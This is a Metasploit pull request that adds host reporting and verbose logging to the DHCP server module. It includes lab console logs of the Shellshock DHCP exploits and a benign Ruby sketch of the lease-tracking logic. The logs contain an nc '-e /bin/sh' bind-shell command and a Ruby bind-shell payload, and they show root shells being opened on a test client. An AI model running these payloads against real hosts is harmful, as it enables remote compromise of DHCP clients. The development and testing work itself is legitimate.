Make DHCP use report_host() and add verbose option #21125
Open
g0tmi1k wants to merge 6 commits into rapid7:master from
auxiliary/server/dhcp$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status;
workspace -D; set VERBOSE true; setg LHOST tap0;
use auxiliary/server/dhcp;
set SRVHOST 10.0.0.1;
set NETMASK 255.255.255.0;
set DHCPIPSTART 10.0.0.2;
set DHCPIPEND 10.0.0.20;
set DHCPINTERFACE tap0;
options; run'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: dJPQXstN.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
LHOST => tap0
SRVHOST => 10.0.0.1
NETMASK => 255.255.255.0
DHCPIPSTART => 10.0.0.2
DHCPIPEND => 10.0.0.20
DHCPINTERFACE => tap0
Module options (auxiliary/server/dhcp):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
DHCPINTERFACE tap0 no The network interface to use for broadcast
DHCPIPEND 10.0.0.20 no The last IP to give out
DHCPIPSTART 10.0.0.2 no The first IP to give out
DNSSERVER no The DNS server IP address
DOMAINNAME no The optional domain name to assign
FILENAME no The optional filename of a tftp boot server
HOSTNAME no The optional hostname to assign
HOSTSTART no The optional host integer counter
NETMASK 255.255.255.0 yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST 10.0.0.1 yes The IP of the DHCP server
Auxiliary action:
Name Description
---- -----------
Service Run DHCP server
View the full module info with the info, or info -d command.
[*] Auxiliary module running as background job 0.
[*] Starting DHCP server
msf auxiliary(server/dhcp) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf auxiliary(server/dhcp) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
* default 1 0 0 0 0 0
msf auxiliary(server/dhcp) >
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf auxiliary(server/dhcp) >
msf auxiliary(server/dhcp) >
msf auxiliary(server/dhcp) > hosts -v
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.0.3 52:54:00:12:34:56 Discovered via DHCP
msf auxiliary(server/dhcp) >
auxiliary/server/dhclient_bash_env$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status;
workspace -D; set VERBOSE true; setg LHOST tap0;
use auxiliary/server/dhclient_bash_env;
set CMD /bin/nc -l -p4444 -e /bin/sh &;
set SRVHOST 10.0.0.1;
set NETMASK 255.255.255.0;
set DHCPIPSTART 10.0.0.2;
set DHCPIPEND 10.0.0.20;
set DHCPINTERFACE tap0;
options; run'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: dJPQXstN.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
LHOST => tap0
CMD => /bin/nc -l -p4444 -e /bin/sh &
SRVHOST => 10.0.0.1
NETMASK => 255.255.255.0
DHCPIPSTART => 10.0.0.2
DHCPIPEND => 10.0.0.20
DHCPINTERFACE => tap0
Module options (auxiliary/server/dhclient_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
CMD /bin/nc -l -p4444 -e /bin/sh & yes The command to run
DHCPINTERFACE tap0 no The network interface to use for broadcast
DHCPIPEND 10.0.0.20 no The last IP to give out
DHCPIPSTART 10.0.0.2 no The first IP to give out
DNSSERVER no The DNS server IP address
FILENAME no The optional filename of a tftp boot server
HOSTSTART no The optional host integer counter
NETMASK 255.255.255.0 yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST 10.0.0.1 yes The IP of the DHCP server
Auxiliary action:
Name Description
---- -----------
Service Run Shellshock DHCP server
View the full module info with the info, or info -d command.
[*] Auxiliary module running as background job 0.
[*] Starting DHCP server
msf auxiliary(server/dhclient_bash_env) >
msf auxiliary(server/dhclient_bash_env) >
msf auxiliary(server/dhclient_bash_env) >
msf auxiliary(server/dhclient_bash_env) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf auxiliary(server/dhclient_bash_env) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(multi/handler) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(multi/handler) > run
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
[*] Started bind TCP handler against 10.0.0.3:4444
[*] Command shell session 1 opened (10.0.0.1:34169 -> 10.0.0.3:4444) at 2026-03-18 11:00:23 +0000
id
uid=0(root) gid=102(dhcp) groups=0(root)
exploit/unix/dhcp/bash_environment$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status;
workspace -D; set VERBOSE true; setg LHOST tap0;
use exploit/unix/dhcp/bash_environment;
set SRVHOST 10.0.0.1;
set NETMASK 255.255.255.0;
set DHCPIPSTART 10.0.0.2;
set DHCPIPEND 10.0.0.20;
set DHCPINTERFACE tap0;
set payload payload/cmd/unix/bind_ruby; set RHOST 10.0.0.1;
options; run'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: dJPQXstN.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
LHOST => tap0
SRVHOST => 10.0.0.1
NETMASK => 255.255.255.0
DHCPIPSTART => 10.0.0.2
DHCPIPEND => 10.0.0.20
DHCPINTERFACE => tap0
payload => cmd/unix/bind_ruby
RHOST => 10.0.0.1
Module options (exploit/unix/dhcp/bash_environment):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
DHCPINTERFACE tap0 no The network interface to use for broadcast
DHCPIPEND 10.0.0.20 no The last IP to give out
DHCPIPSTART 10.0.0.2 no The first IP to give out
DNSSERVER no The DNS server IP address
FILENAME no The optional filename of a tftp boot server
HOSTSTART no The optional host integer counter
NETMASK 255.255.255.0 yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST 10.0.0.1 yes The IP of the DHCP server
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.0.0.1 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
[+] ruby -rsocket -e 'exit if fork;s=TCPServer.new("4444");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end;end'
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Launching exploit. This may take up to 60 seconds.
[!] This module adds a job to /etc/crontab which may require manual removal!
[*] Starting DHCP server
msf exploit(unix/dhcp/bash_environment) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(multi/handler) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf exploit(multi/handler) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.3:4444
[*] Command shell session 1 opened (10.0.0.1:44873 -> 10.0.0.3:4444) at 2026-03-18 11:03:13 +0000
id
uid=0(root) gid=102(dhcp) groups=0(root)
^Z
Background session 1? [y/N] y
msf exploit(multi/handler) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
* default 1 0 1 0 0 0
msf exploit(multi/handler) > hosts -v
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.0.3 52:54:00:12:34:56 Discovered via DHCP
msf exploit(multi/handler) >
Related Issue: #21121
The idea is to see when a client is trying to connect, and then when it's been given an IP.
When we give out an IP address, record the host!
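As an added example (not the PR's or Metasploit's own code): a stand-alone Ruby sketch of the behaviour described above, logging DHCPDISCOVER, leasing an address on DHCPREQUEST, and recording the host only once an address is actually handed out. It parses a minimal BOOTP/DHCP message and replaces the framework's report_host() with an in-memory stand-in; the packet builder and the pool/lease logic are assumptions for this example, not the module's implementation.

```ruby
require 'ipaddr'

DHCP_MAGIC = "\x63\x82\x53\x63".b
MSG_DISCOVER, MSG_REQUEST = 1, 3

# Extract the client MAC (chaddr) and DHCP message type (option 53); nil if not DHCP.
def parse_dhcp(pkt)
  return nil if pkt.bytesize < 240 || pkt.byteslice(236, 4) != DHCP_MAGIC
  mac = pkt.byteslice(28, 6).unpack('C6').map { |b| format('%02x', b) }.join(':')
  type, i = nil, 240
  while i < pkt.bytesize && (code = pkt.getbyte(i)) != 255   # 255 ends the options
    if code == 0 then i += 1; next end                        # pad byte
    len = pkt.getbyte(i + 1) || 0
    type = pkt.getbyte(i + 2) if code == 53 && len == 1
    i += 2 + len
  end
  { mac: mac, type: type }
end

# Constructed packet builder for sample input (not captured client traffic).
def build_dhcp(mac, type)
  [1, 1, 6, 0].pack('C4') + ("\x00".b * 24) + mac.split(':').map(&:hex).pack('C6') +
    ("\x00".b * 202) + DHCP_MAGIC + [53, 1, type, 255].pack('C4')
end

# Stand-in for Metasploit's report_host: an in-memory array replaces the DB (assumption).
REPORTED_HOSTS = []
def report_host(host:, mac:, info:)
  REPORTED_HOSTS << { host: host, mac: mac, info: info }
end

class LeaseTracker
  def initialize(first, last)
    @free = (IPAddr.new(first).to_i..IPAddr.new(last).to_i).map { |n| IPAddr.new(n, Socket::AF_INET).to_s }
    @leases = {} # mac => ip
  end

  # Return the line a verbose module would log; record the host once, only when an IP is handed out.
  def handle(pkt)
    msg = parse_dhcp(pkt) or return nil
    case msg[:type]
    when MSG_DISCOVER then "[*] DHCPDISCOVER from #{msg[:mac]}"
    when MSG_REQUEST
      unless (ip = @leases[msg[:mac]])
        ip = @leases[msg[:mac]] = @free.shift or return "[-] Pool exhausted, ignoring #{msg[:mac]}"
        report_host(host: ip, mac: msg[:mac], info: 'Discovered via DHCP')
      end
      "[+] DHCPREQUEST #{msg[:mac]} -> #{ip}"
    end
  end
end
```

Repeated DHCPREQUESTs from the same MAC, as in the session above, return the same lease and do not create a second host record.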